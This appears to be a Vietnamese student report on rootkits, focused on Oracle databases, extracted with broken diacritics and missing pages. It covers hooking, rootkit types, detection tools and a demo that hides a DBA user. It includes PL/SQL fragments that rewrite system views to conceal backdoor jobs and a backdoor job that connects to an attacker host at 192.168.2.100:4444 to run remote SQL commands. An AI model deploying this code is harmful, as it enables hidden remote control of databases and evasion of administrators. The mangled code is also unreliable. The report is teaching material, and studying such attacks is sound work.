MỤC LỤC MỤC LỤC DANH MỤC HÌNH ẢNH DANH MỤC BẢNG LỜI NÓI ĐẦU CHƢƠNG TỔNG QUAN VỀ ROOTKIT 1.1 Tổng quan mã độc (malware) 1.2 Tổng quan Rootkit 1.2.1 Lịch sử Rootkit 1.2.2 Khái niệm Rootkit 1.3 Cách thức hoạt động Rootkit 1.3.1 Chiếm quyền điều khiển 1.3.2 Kỹ thuật Hooking 1.4 Phân loại Rootkit 10 1.4.1 User-mode rootkit kernel – mode rootkit 10 1.4.2 Persistent non-persistent rootkit 11 CHƢƠNG TẤN CÔNG ROOTKIT TRONG ORACLE 13 2.1 Tổng quan Oracle 13 2.1.1 Oracle instance 13 2.1.2 Oracle Database 14 2.2 Tấn công Rootkit Oracle 17 2.2.1 Tìm hiểu số data dictionary view 17 2.2.2 Khai thác PL/SQL Package 20 2.2.3 Nhiệm vụ Rootkit 27 2.2.4 Cách thức công Rootkit 32 2.2.5 Mô tả công Oracle sử dụng Rootkit kết hợp với Backdoor 39 CHƢƠNG PHÁT HIỆN ROOTKIT 44 3.1 Phƣơng pháp phát Rootkit 44 3.1.1 Quét 44 3.1.2 Theo dõi kiện 45 3.2 Một số phần mềm phát diệt Rootkit 46 CHƢƠNG THỰC HIỆN TẤN CÔNG ROOTKIT TRONG ORACLE 48 4.1 Mục tiêu 48 4.2 Các bƣớc thực 48 KẾT LUẬN 54 TÀI LIỆU THAM KHẢO 55 DANH MỤC HÌNH ẢNH Hình 2.1 Kiến trúc Oracle Server 13 Hình 2.2 System Global Area SGA 14 Hình 2.3 Trƣớc ẩn user Hacker 28 Hình 2.4 Sau ẩn user Hacker 29 Hình 2.5 V$session trƣớc ẩn session 30 Hình 2.6 V$session sau ẩn session 30 Hình 2.7 dba jobs trƣớc ẩn job 31 Hình 2.8 dba jobs sau ẩn job 31 Hình 2.9.Trƣớc thay đổi binary 33 Hình 2.10 Sau thay đổi binary 34 Hình 2.11 Đƣờng dẫn thực thi Oracle 35 Hình 2.12 Trƣớc thay đổi đƣờng dẫn thực thi 35 Hình 2.13 Tạo view 36 Hình 2.14 Truy xuất sau thay đổi đƣờng dẫn 36 Hình 2.15 Sử dụng PL/SQL native 39 Hình 2.16 Sử dụng PL/SQL native 39 Hình 4.1.Giao diên SQL Plus 48 Hình 4.2 Tạo user hacker 48 Hình 4.3 Gán quyền DBA cho hacker 49 Hình 4.4 Đ ng nhập user hacker 49 Hình 4.5 Truy vấn đến bảng dba_users 49 Hình 4.6 Tạo view DBA HACK để ẩn user hacker 50 Hình 4.7 Tạo synonym có tên hacker.dba users 50 Hình 4.8 Đ ng nhập user hacker chế độ thƣờng truy vấn đến bảng DBA_USERS 50 Hình 4.9 Xem thông tin log group 51 Hình 4.10 Xem thơng tin member logfile 51 Hình 4.11 Thêm member logfile 52 Hình 4.12 Truy vấn bảng logfile để kiểm tra member vừa tạo 52 Hình 4.13 Xóa member logfile 52 Hình 4.14 Kiểm tra lại bảng logfile 53 DANH MỤC BẢNG Bảng 2.1 View dba_jobs 18 Bảng 2.2 View dba_jobs_running 19 Bảng 2.3 V$Process 19 Bảng 2.4 V$Session 20 Bảng 2.5 dbms_metadata 21 Bảng 2.6 Dạng XML object 22 Bảng 2.7 dbms_output 23 Bảng 2.8 dbms_jobs 23 Bảng 2.9 dbms_sql 25 Bảng 2.10 Các function 27 Bảng 2.11 Thông tin user, job, process 32 LỜI NÓI ĐẦU Những n m gần đây, bảo mật vấn đề nhức nhối làm đau đầu công ty, tổ chức với tiện ích to lớn mà cơng nghệ thơng tin, internet mang lại nguy an tồn, nguy hiểm sử dụng tiện ích t ng nhanh chóng: thực tế từ thông tin cá nhân ngƣời dùng, liệu cơng ty tổ chức bình thƣờng tới bí mật quân sự, bí mật quốc gia quan trọng bị hacker đánh cắp qua internet, máy tính Thông tin cá nhân: Hãng bảo mật Hold Security (Mỹ) vừa tiết lộ, tin tặc Nga nắm giữ tay đến 1,2 tỉ tài khoản ngƣời dùng toàn cầu Các liệu đƣợc lƣu trữ database công ty, tổ chức lớn bị đánh cắp nhiều nhƣ tài khoản ngân hàng, chiến lƣợc kinh doanh Bí mật quân sự, bí mật quốc gia: Các tài liệu mà cựu nhân viên tình báo Cơ quan An ninh Quốc gia Mỹ NSA cung cấp cho tạp chí Đức Der Spiegel, cho thấy gián điệp mạng Trung Quốc đánh cắp "khối lƣợng to lớn" thông tin quân nhạy cảm liên quan đến F-35 – máy bay tàng hình tối tân Mỹ Các Hackers thƣờng lợi dụng lỗ hổng bảo mật, sử dụng Virus, Trojan, Malware để thực hành vi phá hoại, n cắp thơng tin Tuy nhiên điều nguy hiểm hành vi ngày khó phát công ty tổ chức gần Hackers sử dụng số biện pháp che dấu hoạt động hệ thống xóa bỏ dấu vết truy cập ngày tinh vi Một số kĩ thuật Rootkit Ví dụ vụ công vào hệ sở liệu Oracle: Rootkit đƣợc cài đặt sau đột nhập thành công vào Oracle database, để che giấu dấu vết đột nhập, trở thành bình phong che chắn diện attacker database Ngƣời quản trị khó lòng biết đƣợc database có bị nhìn ngó hay bị cơng hay khơng Với tốc độ phát triển nhanh chóng ngày tinh vi, n m gần Rootkit đƣợc xếp vào top 10 nguy bảo mật nguy hiểm Rootkit vấn đề nan giải chuyên gia bảo mật tồn cầu, nhiên Việt Nam tài liệu hiểu biết Rootkit hạn hẹp nên nhóm chúng em thực đề tài để hiểu biết thêm Rootkit Tổng kết đề tài gồm phần chính: Chương1: Tổng quan Rootkit, cách thức Rootkit hoạt động Oracle số phƣơng pháp phát Rootkit Chương 2: Tấn công Rootkit Oracle Chương 3: Phát Rootkit Chương 4: Thực công Rootkit Oracle Với thời gian thực kiến thức có hạn, nhóm trau dồi, tỉ mỉ nhƣng khơng thể tránh khỏi thiếu sót Nhóm mong nhận đƣợc góp ý thầy bạn đọc để nhóm hồn thiện tốt đề tài Chúng em xin chân thành cảm ơn! CHƢƠNG TỔNG QUAN VỀ ROOTKIT 1.1 Tổng quan mã độc (malware) Thuật ngữ Malware từ viết tắt Malicious software Malware đƣợc định nghĩa chƣơng trình đƣợc chèn cách bí mật vào hệ thống với mục đích làm hại đến tính bí mật, tính sẵn sàng hệ thống Các loại malware nhƣ: virus, worms, trojans, backdoor, spyware… Mục tiêu malware thơng tin cá nhân, liệu, tài nguyên máy tính… Bằng cách ghi dấu thói quen lƣớt Web bạn, chúng biết vấn đề bạn quan tâm quảng cáo mà phù hợp với ý định bạn Những malware cho phép công ty quảng cáo thiết kế pop up nắm bắt mục đích cá nhân Xa nữa, malware điều khiển nội dung đƣợc hiển thị trình duyệt bạn Đó hacking Các nội dung tìm kiếm hiển thị bạn bị hack sang trang mà malware định Điều đƣa đến nhiều phiền toái pop up liên tục nhảy ra, tệ chứa virus, worm mà vơ tình kích phải chúng xâm nhập vào máy tính bạn Đối với thông tin cá nhân nhƣ: thông tin dùng để đ ng nhập vào tài khoản ngân hàng, chuyển tiền, rút tiền… Nếu bạn dùng password, hacker dùng chƣơng trình giải mã mật Hoặc giả chƣơng trình an ninh, dụ bạn cài vào mà khơng biết có chƣơng trình keylogger, spyware… sẵn sàng lấy cắp thông tin bạn Cuối cùng, hacker lợi dụng tài nguyên hệ thống vào mục đích nhƣ công hệ thống khác, ẩn nấp sau hệ thống bạn nhằm che giấu hành tung Để thực đƣợc mục đích này, malware thực dễ dàng có trợ giúp rootkit Vì malware cài đặt rootkit vào máy, tới lƣợt rootkit che giấu hành vi malware Thực tế, rootkit xấu hay tốt mục đích mà đƣợc sử dụng 1.2 Tổng quan Rootkit 1.2.1 Lịch sử Rootkit Kỹ thuật Rootkit khơng mẻ với ngƣời làm lĩnh vực An tồn thơng tin Đầu tiên rootkit đƣợc phát triển hệ điều hành Unix-like Solaris Linux sau Windows N m 1999, Rootkit đƣợc công khai Windows Greg Hoglundmột chuyên gia bảo mật ngƣời lập website rootkit.com Thuật ngữ rootkit bắt nguồn từ root – mức truy nhập cao vào hệ thống, có quyền admin từ kit- tập công cụ để che giấu chiếm quyền Việc phát Sony Rootkit rootkit quản lí quyền số Mark Russonovich Sysinternal khiến rootkit đƣợc quan tâm cách đặc biệt nhiều ngƣời bắt đầu tìm hiểu hoạt động Cho tới kiện đó, rootkit khêu gợi tò mò, hiểm họa cận kề Sự kiện Sony Rootkit xảy ngày 31/10/2005 đƣa rootkit thành trung tâm ý Nó chứng tỏ, hãng nghiên cứu phát triển kỹ thuật rootkit cách quy củ Sau kiện này, Sony phải tiến hành gỡ bỏ rootkit đĩa CD tốn khoản bồi thƣờng khơng Sự kiện đƣợc cho trƣớc sau xảy ra, mà nhà cung cấp bảo mật đƣa nhiều biện pháp để chống lại kiểu nguy có thể, ngƣời tạo malware tƣơng ứng đáp lại kỹ thuật n cắp tinh ranh Bằng cách sử dụng rootkit khả n ng lút nó, hacker máy tính tìm cách hiệu để cơng Các chƣơng trình che giấu rootkit cho thấy nguy cận kề an ninh mạng Thực tế, ngày 6/12/2005 tạp chí eweek cơng bố có tới 20% malware bị phát Windows XP SP2 rootkit Một số liệu sau vào ngày 6/12/2006 ghi nhận tỉ lệ rootkit số malware 14%, thời điểm kiện Sony Rootkit số 8% 1.2.2 Khái niệm Rootkit Rootkit /ru:tkit/ công cụ phần mềm che giấu tồn file nhƣng thực hoạt động Rootkit thƣờng đƣợc bên thứ ba thƣờng kẻ xâm nhập dùng sau chiếm đƣợc quyền truy cập vào hệ thống máy tính Các công cụ thƣờng nhằm để che dấu liệu hệ thống, tập tin tiến trình chạy, từ giúp cho kẻ xâm nhập trì quyền truy cập vào hệ thống mà ngƣời dùng Rootkit có nhiều loại hệ điều hành nhƣ Linux, Solaris phiên Microsoft Windows Một máy tính bị cài rootkit đƣợc gọi bị "chiếm quyền root" ("rooted" tiếng Anh) 1.3 Cách thức hoạt động Rootkit 1.3.1 Chiếm quyền điều khiển Bất kì user hay chƣơng trình truy vấn hệ thống, kết trả đƣợc mặc định tin tƣởng không gợn chút nghi vấn Rootkit lợi dụng tin tƣởng Đầu tiên phải chiếm đƣợc quyền quản trị hệ thống để điều khiển hệ thống làm cho Vì chiếm quyền admin bƣớc vô quan trọng định 1.3.2 Kỹ thuật Hooking Là kỹ thuật mà Rootkit sử dụng để thay đổi đƣờng dẫn thực thi hệ điều hành- chặn lời gọi hệ thống điều chỉnh kết cho khơng có dấu vết tồn Hook chuyển hƣớng chƣơng trình bình thƣờng, sang hàm rootkit thay hàm hệ thống Cả kernel mode user mode rootkit sử dụng kỹ thuật hooking để lọc kết trả OS giấu tồn Các chƣơng trình phân tích qt khơng phát thơng tin tồn Registry, nhƣ port mà rootkit sử dụng Đó chƣơng trình dựa thơng tin lấy từ OS Chúng ta không phát đƣợc rootkit thông qua công cụ nhƣ Task Manager, windows explorer hay regedit Windows sử dụng table để lƣu trữ ghi dấu thông tin quan trọng Các table bị hook, thay đổi bẻ gẫy rootkit User mode kernel mode rootkit sử dụng kỹ thuật hook loại bị hạn chế mà chúng hook phạm vi hoạt động chúng User mode rootkit hook table phạm vi khơng gian địa dành cho user bảng IAT, EAT chèn jump vào API mức user để thay system call sang function rootkit Có hai kiểu hook priviledge hook unpriviledged hooks User mode rootkit unpriviledge hook, kernel mode rootkit priviledge hook Ở kiểu hook khác quyền hệ thống sử dụng kỹ thuật hook giống Kỹ thuật hooking API: user mode rootkit chặn lời gọi hàm API thay đổi địa API IAT thuộc tiến trình user, sau trỏ tới rootkit function thay Windows API functions Cả user mode kernel mode rootkit sử dụng API hooking để đảm bảo OS trả kết đƣợc sàng lọc, vốn bỏ rơi tiết lộ rootkit hay tung tích User mode rootkit chỉnh sửa table thuộc chƣơng trình user Mỗi chƣơng trình user có IAT riêng chứa thơng tin function mà kernel thực cho Để hiệu quả, user mode rootkit phải tìm cách để thay đổi table user program điều khiển chƣơng trình sửa chạy để hook API tƣơng ứng chƣơng trình Rootkit khơng thiết phải hook API, API liên quan tới Ví dụ hook API Task Manager dùng để liệt kê process API mà dùng Windows Explorer để liệt kê danh sách file, folder Và phải hook API tiến trình đƣợc kích hoạt nên user mode rootkit hiệu kernel mode rootkit Kernel mode rootkit cần hook cấu trúc mà tất user program sử dụng 1.4 Phân loại Rootkit Rootkit đƣợc chia thành hai loại– user mode kernel mode rootkit, phụ thuộc vào phạm vi ảnh hƣởng liệu chúng tồn nhớ hay sau khởi động lại đƣợc ghi lên ổ đĩa persisten non-persistent rootkit 1.4.1 User-mode rootkit kernel – mode rootkit Đây rootkit có chế điều khiển phạm vi ảnh hƣởng lên hệ điều hành khác Cơ chế điều khiển thông qua đặc quyền mà giành đƣợc Đặc quyền lớn, phạm vi ảnh hƣởng t ng Bất kể chế độ nữa, rootkit dựa sở: chƣơng trình giao tiếp với nhờ lời gọi hàm Tùy vào mức đặc quyền chƣơng trình, tạo lời gọi trực tiếp tới kernel hay gián tiếp qua bên xử lí thứ ba đứng kernel Hay ngƣời ta gọi User mode kernel mode Rootkit mức user, mức đặc quyền thấp nhất, phải sử dụng giao diện ứng dụng chƣơng trình API để gửi yêu cầu tới hệ thống Các lời gọi thông qua thƣ viện liên kết động mức user DLL để đƣợc chuyển thành thơng điệp mà kernel hiểu Thực tế chƣơng trình mức user khơng tự chứa tất khả n ng xử lí, phải dùng tạo system call tới kernel Ví dụ, user click nút OK Windows chuyển thơng tin thành system call để hệ thống xử lí Ngơn ngữ mà Window cung cấp để thực giao tiếp kernel chƣơng trình mức user gọi API Để vận hành tốt hơn, chƣơng trình user tự tạo bảng riêng chứa địa tất API 10 LAST_SEC, THIS DATE,substr to char this date,”HH24:MI:SS” ,1,8 THIS SEC,j.f eild1 INSTANCE From sys.job$ j, v$lock v Where v.type = “JQ” and j.job + = v.id2 and j.what not like “DECLARE 1_cn UTL_TCP.CONNECTION;%”‟; Code ẩn connect backdoor backdoor console sý.ku$ job t: EXECUTE IMMEDIATE „CREATE OR REPLACE FORCE VIEW “SYS”.”KU$ JOB VIEW” OF “SYS”.”KU$ JOB T” WITH OBJECT IDENTIFIER powner id AS select “1”,”0”, u.user#, j.powner, j.lowner, j.cowner, j.job, TO CHAR j.last date,”YYYY-MM-DD:HH24:MI:SS” , TO CHAR j.this date,”YYYY-MM-DD:HH24:MI:SS), TO CHAR j.next date,”YYYY-MM-DD:H24:MI:SS), j.flag, j.failures, REPLACE j.interval#,”””‟,””””””” , REPLACE j.what,”””,”””””” , REPLACE j.nlsenv,”””,””””” , j.env, j.field1, j.charenv from sys.job$ j, sys.user$ u where j.powner=u.name and j.what not likle “DECLARE cn UTL TCP.CONNECTION;%”‟; COMMIT; RETURN”; END; 2.2.5.2.Tạo OracleBackdoor.sql Mã tạo function thực job đọc command từ host attacker, thực thi chúng gửi command output trở cho attacker Tạo function ins_backdoor thực thi với quyền user gọi nó, function có đặc tính autonomous transaction để sau đƣợc sử dụng SQL injection CREATE OR REPLACE FUNCTION ins_backdoor RETURN VARCHAR2 AUTHID 41 CURRENT_USER AS PRAGMA AUTONOMOUS_TRANSACTION; Job_id NUMBER; BEGIN Đƣa job sử dụng chức n ng job package dbms job Để kết nối tcp/ip với backdoor console sử dụng package chuẩn utl_tcp Oracle: DBMS_JOB.SUBMIT job id, „DECLARE cn UTL_TCP.CONNECTION; 1_ret_valPLS_INTEGER; 1_sqlstm VARCHAR2(320000); 1_thercursor INTEGER; 1_columnvalue VARCHAR2(2000); 1_status INTEGER; 1-colcnt NUMBER DEFAULT 0; 1_desc_t DBMS_SQL.DESC_TAB; BEGIN Mở kết nối tới hót attacker nơi đặt backdoor console.Trong scntp 192.268.2.100,TCP port 4444 cn:=UTL TCP.OPEN CONNECTION “192.168.2.100,4444,1521 ; Lấy thơng tin database gửi qua kết nối TCP dƣới dạng XML; SELECT V$DATABASE; DBID,NAME INTO 1_colcnt,1_sqlstm FROM SEL.ECT banner INTO 1_colcnt,1_columnvalue FROM V$VERSION WHERE ROWNUM=1; ret val:=UTL TCP.WRITE LINE cn, “” ; LOOP 1_sqlstm :=UTL_TCP.GET_LINE(1_cn, TRUE); EXIT WHEN UPPER sqlstm =”EXIT”; BEGIN 1_thecursor:=DBMS_SQL.OPEN_CURSOR; 42 Nếu câu lệnh SQL nhận đƣợc Select,đầu tiên lấy tất tên cột gửi chúng để backdoor console hiển thị column header tập trung IF SUBSTR LTRIM sqlstm , 1, =”SELECT”THEN DBMS_SQL.PARSE(1_thecursor,1_sqlstm,DBMS_SQL.NATIVE); DBMS_SQL.DESCRIBE_COLUMNS(1_thecursor,1_colcnt,1_dese_t); FOR I IN 1_colcnt LOOP ret val:= UTL TCP.WRITE LINE cn,”” || desc t i col name ; DBMS_SQL.DEFINE_COLUMN(1_thecursor, I,1_columnvalue,2000); 43 CHƢƠNG PHÁT HIỆN ROOTKIT 3.1 Phƣơng pháp phát Rootkit Hiện công ty bảo mật sử dụng nhiều cách để phát đƣợc rootkit, kể đến nhƣ việc phát dấu hiệu mà rootkit để lại, kiểm tra chữ kí kĩ thuật số để so sánh xem rootkit có thay đổi hay khơng, phát hành vi nghi ngờ Với kernel-mode rootkit, việc tìm chúng phải qua nhiều cơng đoạn phức tạp phải điều tra kĩ lƣỡng System Call Table nơi lƣu tiến trình hệ thống để phát hàm mà rootkit dùng để "móc" vào Có hai cách để phát rootkit máy bị nhiễm: quét theo dõi kiện 3.1.1 Quét Phƣơng pháp phát rootkit nói chung thƣờng so sánh trạng thái trƣớc sau hệ thống để tìm điểm khác biệt, thƣờng có kiểu so sánh sau:  So sánh danh sách tệp hệ thống với hệ thống  So sánh danh sách tệp có với NTFS Master File Table  So sánh khóa registry với mẫu  So sánh danh sách tiến trình dịch vụ sử dụng nhiều hàm hệ thống khác  So sánh danh sách tiến trình dịch vụ kỹ thuật chèn tiến trình rootkit  Phát việc sử dụng ADS  So sánh trạng thái bảng dịch vụ hệ thống  Kiểm tra phần tử bảng gọi dịch vụ hệ thống có nằm dải địa cỏc mụ đun liên quan hay khơng  Dù tìm theo chữ kí rootkit vùng nhớ kernel Kĩ thuật quét sử dụng phƣơng pháp so sánh cách nhìn hệ thống sử dụng công cụ mức ngƣời dùng với cách nhìn từ bên lõi HĐH Nếu có dấu hiệu che giấu nào, thành phần phải lên bên lõi khơng phải hình ngƣời dùng Gần có nhiều chƣơng trình đảm nhiệm chức n ng quét 44 Về mặt lý thuyết phƣơng pháp tốt – rootkit giấu tài nguyên hệ thống, cách tốt để phát rootkit tìm kiếm bị che giấu Tuy nhiên có vài nhƣợc điểm Nhƣợc điểm thân HĐH có lỗi việc qt bị rootkit qua mặt Khả n ng xảy nguy phụ thuộc vào cụ thể trình quét thân rootkit đƣợc thực thi nhƣ Thƣờng lõi HĐH Windows khơng đƣợc mơ tả cơng khai khó đảm bảo tiến trình qt đạt kết xác Hơn nữa, rootkit tránh bị phát cách che giấu tất tiến trình ngoại trừ tiến trình phát rootkit 3.1.2 Theo dõi kiện Một cách khác sử dụng hệ thống hoạt động dựa kiện liên tục theo dõi để nắm đƣợc rootkit vào thời điểm tiến hành tác vụ cài đặt Những chƣơng trình nhƣ thƣờng đƣợc gọi hệ thống chống xâm nhập (IPS) Việc theo dõi từ phía HĐH cần thiết Các hệ thống IPS theo dõi mức ngƣời dùng thực bị rootkit cơng nhƣ chƣơng trình khác ngƣời dùng Những hệ thống phát khóa tác vụ nạp module HĐH Tuy nhiên việc khóa hết module lại điều phi thực tế - nhiều chƣơng trình hợp lệ khác tiến hành cài đặt module lõi Ví dụ, số trình diệt virus sử dụng module lõi để thực tác vụ quét theo yêu cầu Vẫn đƣa giải pháp hay tính thêm khả n ng cân nhắc liệu việc nạp module có phải xấu hay khơng cách xem xét thuộc tính khác cài đặt chƣơng trình liên quan Trong rootkit trình duyệt virus có chung số tác vụ nhƣ cài đặt module lõi phần lớn đặc tính khác chúng lại hồn tồn khơng giống Ví dụ, rootkit cố gắng “lánh mặt” cách không tạo cửa sổ trực quan, trình diệt virus lại muốn cho ngƣời dùng biết diện chƣơng trình Trình rootkit cài keylogger (bắt bàn phím gửi thơng tin tới ngƣời dùng khác chƣơng trình diệt virus hồn tồn khơng làm Bằng cách tổng hợp đặc tính hành động khác đƣợc lựa chọn cẩn thận để bắt đƣợc thao tác chung liên quan 45 tới phần mềm mục đích xấu), việc phát chƣơng trình rootkit hồn tồn thực đƣợc với độ tin tƣởng cao Thực tế, phƣơng pháp có tên “đánh giá qua hành động” đƣợc áp dụng rộng rãi để phát lớp mã mục đích xấu nhƣ Trojan hay phần mềm gián điệp Vì dựa ngun lý đánh giá, tích lũy kinh nghiệm, hệ thống kiểu mắc lỗi (coi chƣơng trình bình thƣờng phần mềm xấu) Cách giải đơn giản với vấn đề cần phải có danh sách cấm cho lỗi chung thƣờng gặp 3.2 Một số phần mềm phát diệt Rootkit Virus Rootkit loại virus nguy hiểm có khả n ng ẩn dấu đoạn mã độc gây nguy hiểm đến máy tính Đặc biệt khả n ng ẩn dấu loài virus cực cao, chúng khiến cho phần mềm diệt virus lầm tƣởng chúng ứng dụng vơ hại bỏ qua chúng Lồi virus lâu máy tính nguy ảnh hƣởng đến độ an toàn thiết bị trở nên nghiêm trọng Hơn có khả n ng giấu thêm malware cách công mà tin tặc hay tận dụng Vậy làm để tiêu diệt chúng? Hầu hết chƣơng trình dùng phát rootkit đòi hỏi ngƣời dùng có biết chút kĩ thuật Tuy nhiên, có hai chƣơng trình dễ sử dụng hai chƣơng trình hiệu  Panda Anti-Rootkit Tải phần mềm tại: http://www.pandasoftware.com/products/antirootkit/ Đây chƣơng trình miễn phí, tƣơng thích Windows 2K, XP, có dung lƣợng 353KB Panda Anti-Rootkit phần mềm dành cho ngƣời dùng thơng thƣờng, khơng có khả n ng phát mà giúp loại bỏ rootkit hiệu Panda Anti-Rootkit có dung lƣợng nhỏ, khơng cần cài đặt bạn phải đ ng ký website Panda trƣớc tải xuống Chúng đề nghị bạn nên tải sản phẩm tiến hành thao tác qt máy tính Nếu khơng tải đƣợc từ website Panda, bạn sử dụng đƣờng link sau http://www.majorgeeks.com/files/details/panda_anti_rootkit.html 46  BlackLight Link tải : http://www.f-secure.com/blacklight/ Panda Anti-Rootkit BlackLight có khả n ng phát hầu hết rootkit mà chƣơng trình chống virus bỏ qua Tuy nhiên hai khơng phải chƣơng trình thực hoàn hảo nên tốt bạn nên dùng hai chƣơng trình Nếu bạn ngƣời sử dụng máy tính có kinh nghiệm, bạn nên dùng thử Rootkit Revealer SysInternals Link tải về: https://docs.microsoft.com/enus/sysinternals/downloads/rootkit-revealer Phần mềm có dung lƣợng 231KB, shareware dùng chung , chạy tất phiên Windows Chƣơng trình sử dụng kĩ thuật khác hoàn toàn với Panda Anti-Rootkit BlackLight, bạn nên sử dụng chƣơng trình để có n ng lực tối đa việc tìm diệt rootkit máy tính Ngƣời dùng kinh nghiệm nên dùng GMER http://www.gmer.net/ miễn phí, chạy Windows NT/ 2K/XP/Vista, dung lƣợng 450KB Bạn nên đọc tài liệu hƣớng dẫn kĩ trƣớc sử dụng Sản phẩm tốt nhƣng dành cho tất ngƣời Do đó, bạn ngƣời khối nhấn nút "scan" nên dùng Panda Anti-Rootkit BlackLight ) 47 CHƢƠNG THỰC HIỆN TẤN CÔNG ROOTKIT TRONG ORACLE 4.1 Mục tiêu Tạo user gán quyền dba ẩn user đó, khơng biết user nắm quyền cao hệ thống Sau chiếm đƣợc quyền cao hệ thống user thực việc thêm xóa file log để che giấu hành vi Muốn cơng rootkit hệ quản trị CSDL Oracle ta phải chiếm đƣợc Root hệ quản trị CSDL, sau thực hành vi che giấu, thay đổi đƣờng dẫn nhằm xóa dấu vết Thêm, xóa log file 4.2 Các bƣớc thực Bƣớc 1: Mở SQL Plus đ ng nhập vào hệ thống tài khoản SYSTEM với tƣ cách tin tặc nh 4.1.Giao diên SQL Plus Bƣớc 2: Tạo user HACKER với mật HACKER nh 4.2 Tạo user hacker 48 Bƣớc 3: Gán quyền DBA cho HACKER nh 4.3 Gán quyền DBA cho hacker Bƣớc 4: Đ ng nhập với ngƣời dùng vừa tạo dƣới quyền cao nh 4.4 Đăng nhập user hacker Bƣớc 5:Truy vấn đến bảng DBA USERS có chứa user tạo nh 4.5 Truy vấn đến bảng dba_users Bƣớc 6: Tạo view DBA HACK để ẩn user hacker nhằm đánh lừa ngƣời dùng 49 nh 4.6 Tạo view DBA_ ACK để ẩn user hacker Bƣớc 7: Tạo synonym có tên hacker.dba users nh 4.7 Tạo synonym có tên hacker.dba_users Bƣớc 8: Đ ng nhập user hacker chế độ thƣờng truy vấn đến bảng DBA USERS Ta khơng thấy user hacker nh 4.8 Đăng nhập user hacker chế độ thường truy vấn đến bảng DBA_USERS 50 Bƣớc 9: Xem thông tin log group nh 4.9 Xem thông tin log group Bƣớc 10: Xem thông tin member logfile nh 4.10 Xem thông tin member logfile 51 Bƣớc 11: Thêm member logfile nh 4.11 Thêm member logfile Bƣớc 12: Truy vấn bảng logfile để kiểm tra member vừa tạo nh 4.12 Truy vấn bảng logfile để kiểm tra member vừa tạo Bƣớc 13: Xóa member logfile nh 4.13 Xóa member logfile 52 Bƣớc 14: Kiểm tra lại bảng logfile liệu bị xóa hồn tồn nh 4.14 Kiểm tra lại bảng logfile 53 KẾT LUẬN Database đƣợc coi tài sản có giá trị công ty Nếu database không hoạt động, công ty khơng thể thực giao dịch, thấy thiệt hại đƣợc tính theo khơng hoạt động database DB phần hệ thống, bao bọc phía ngồi web application, internal networks, partner network, điểm để truy nhập vào database Và cho dù OS network đƣợc đảm bảo an tồn database bị công qua lỗ hổng tràn đệm, SQL injection, đốn password, rootkit, backdoor… Vì việc đảm bảo an tồn cho DB bao gồm đảm bảo tính bí mật, tồn vẹn sẵn sang liệu quan trọng cần thiết khơng an toàn cho OS hay ứng dụng khác Qua trình tìm hiểu thực đề tài, nhóm nhận thấy Rootkit có nguy bảo mật nguy hiểm Hiểu biết cách phòng tránh Rootkit vô quan trọng tránh đƣợc tổn thất to lớn Nhóm tìm, dịch đọc hiểu đƣợc khái niệm c n Rootkit thực demo Rootkit Oracle… Do thời gian có hạn, hồn thành nhƣng nhóm nhận thấy có nhiều thứ cần bổ sung, tìm hiểu sâu để hồn thiện đề tài:  Cần tạo đƣợc đoạn mã độc virus thực nhúng rootkit vào để hoàn thiện từ khâu công chiếm quyền Root đến lấy thông tin xóa dấu vết  Tìm hiểu sâu phƣơng pháp phát diệt Rootkit hiệu quả, dễ sử dụng 54 TÀI LIỆU THAM KHẢO [1] Diễn đàn cộng đồng Việt, “Kiến trúc Oracle”, http://diendan.congdongcviet.com/threads/t274::kien-truc-oracle.cpp [2] HD vuonchuoi Theo kAmIkAzE , “[Rootkit] Tìm hiểu Rootkit”, Blogspot, https://rootbiez.blogspot.com/2009/06/rootkit-tim-hieu-ve-rootkit.html [3] Tấn công Rootkit Oracle, AT8, Học viện Kỹ thuật mật mã, https://123doc.org/document/3624515-tan-cong-rootkit-trong-oracle-at8ahvktmm.html [4] Alexander Kornbrust (2006), Oracle Rootkit 2.0, Black Hat 2006 USA 55